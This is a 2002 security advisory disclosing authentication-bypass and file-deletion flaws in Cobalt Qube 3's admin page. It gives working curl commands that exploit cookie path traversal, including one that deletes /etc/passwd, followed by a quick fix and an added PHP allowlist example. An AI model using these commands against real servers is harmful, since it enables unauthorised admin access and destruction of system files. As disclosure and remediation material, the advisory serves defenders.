[UNIX] Cobalt Qube 3 Administration Page Insecurity
From: support@securiteam.com
Date: 07/25/02
From: support@securiteam.com To: list@securiteam.com Date: Thu, 25 Jul 2002 12:05:17 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Cobalt Qube 3 Administration Page Insecurity
------------------------------------------------------------------------
SUMMARY
Several security vulnerabilities have been found in the Cobalt Qube 3
product. They allow an attacker to bypass the authentication mechanism,
gaining administrative privileges, and to delete any file they want.
DETAILS
Vulnerable systems:
Cobalt Qube 3 release 6.0 (Kernel 2.2.16C7)
Problem 1: Local Privilege Escalation to Admin
Any user able to create a file in any location on a Cobalt server can
promote themselves to Admin access in System Management. A user may
create the file /tmp/test and construct a cookie to log in as Admin
without a password:
Create a dummy session file on the Cobalt server:
$ printf "admin" > /tmp/test
Log in without a password from anywhere:
$ curl -b sessionId=/../../../../../../tmp/test\;loginName=admin http://192.168.0.1:444/splashAdmin.php
Problem 2: Remote User access
By using the account name of a newly created user, we can bypass
authentication without needing to create a dummy session file on the server:
$ curl -b sessionId=../codb/objects/4/.name\;loginName=admin http://192.168.0.1:444/splashAdmin.php
Problem 3: Remotely delete files
It is possible to delete a file from the server by specifying the path to
the file and the first 31 characters of the file. The following example
will delete the /etc/passwd file from the server:
$ curl -b sessionId=../../../../../../../../etc/passwd\;loginName=root:x:0:0:root:/root:/bin/bash http://192.168.0.1:444/splashAdmin.php
Quick Solution:
Modify file /usr/sausalito/ui/libPhp/ServerScriptHelper.php:
line 64:
$sessionId = ereg_replace("\.\.","",$sessionId);
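A stricter variant of the quick fix above, as an added example that is not from the advisory or from Cobalt's code: instead of stripping "..", it accepts only session IDs that match an allowlist and resolve to a regular file directly inside the session directory. The directory path, the ID format and the function names are assumptions.

```php
<?php
// Added example, not Cobalt's code. SESSION_DIR and the ID format are assumptions.
const SESSION_DIR = '/tmp/example-sessions';   // hypothetical session store

// The advisory's quick fix, expressed with preg_replace
// (ereg_replace was removed in PHP 7).
function strip_dotdot(string $sessionId): string
{
    return preg_replace('/\.\./', '', $sessionId);
}

// Stricter check: accept only IDs matching an allowlist, then confirm the
// resolved path is a regular file directly inside SESSION_DIR.
function session_file(string $sessionId): ?string
{
    if (!preg_match('/\A[A-Za-z0-9]{16,64}\z/', $sessionId)) {
        return null;                       // rejects '/', '.', ';' and empty IDs
    }
    $base = realpath(SESSION_DIR);
    $path = realpath(SESSION_DIR . '/' . $sessionId);
    if ($base === false || $path === false) {
        return null;                       // no such session
    }
    if (dirname($path) !== $base || !is_file($path)) {
        return null;                       // a symlink led outside the store
    }
    return $path;
}

// Constructed inputs: the three cookie values from the advisory plus one
// well-formed ID whose session file is created here.
@mkdir(SESSION_DIR, 0700);
$good = str_repeat('a1B2', 8);
file_put_contents(SESSION_DIR . '/' . $good, 'admin');

$samples = [
    '/../../../../../../tmp/test',
    '../codb/objects/4/.name',
    '../../../../../../../../etc/passwd',
    $good,
];
foreach ($samples as $id) {
    printf("%-36s strip=%-20s allowlist=%s\n",
        $id, strip_dotdot($id), session_file($id) === null ? 'reject' : 'accept');
}
```

The stripped values still contain "/", so the quick fix depends on how the session path is built afterwards, while the allowlist rejects all three advisory cookie values outright.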
ADDITIONAL INFORMATION
The information has been provided by
<mailto:pokleyzz@scan-associates.net> pokleyzz,
<mailto:sk@scan-associates.net> sk, and
<mailto:shaharil@scan-associates.net> shaharil.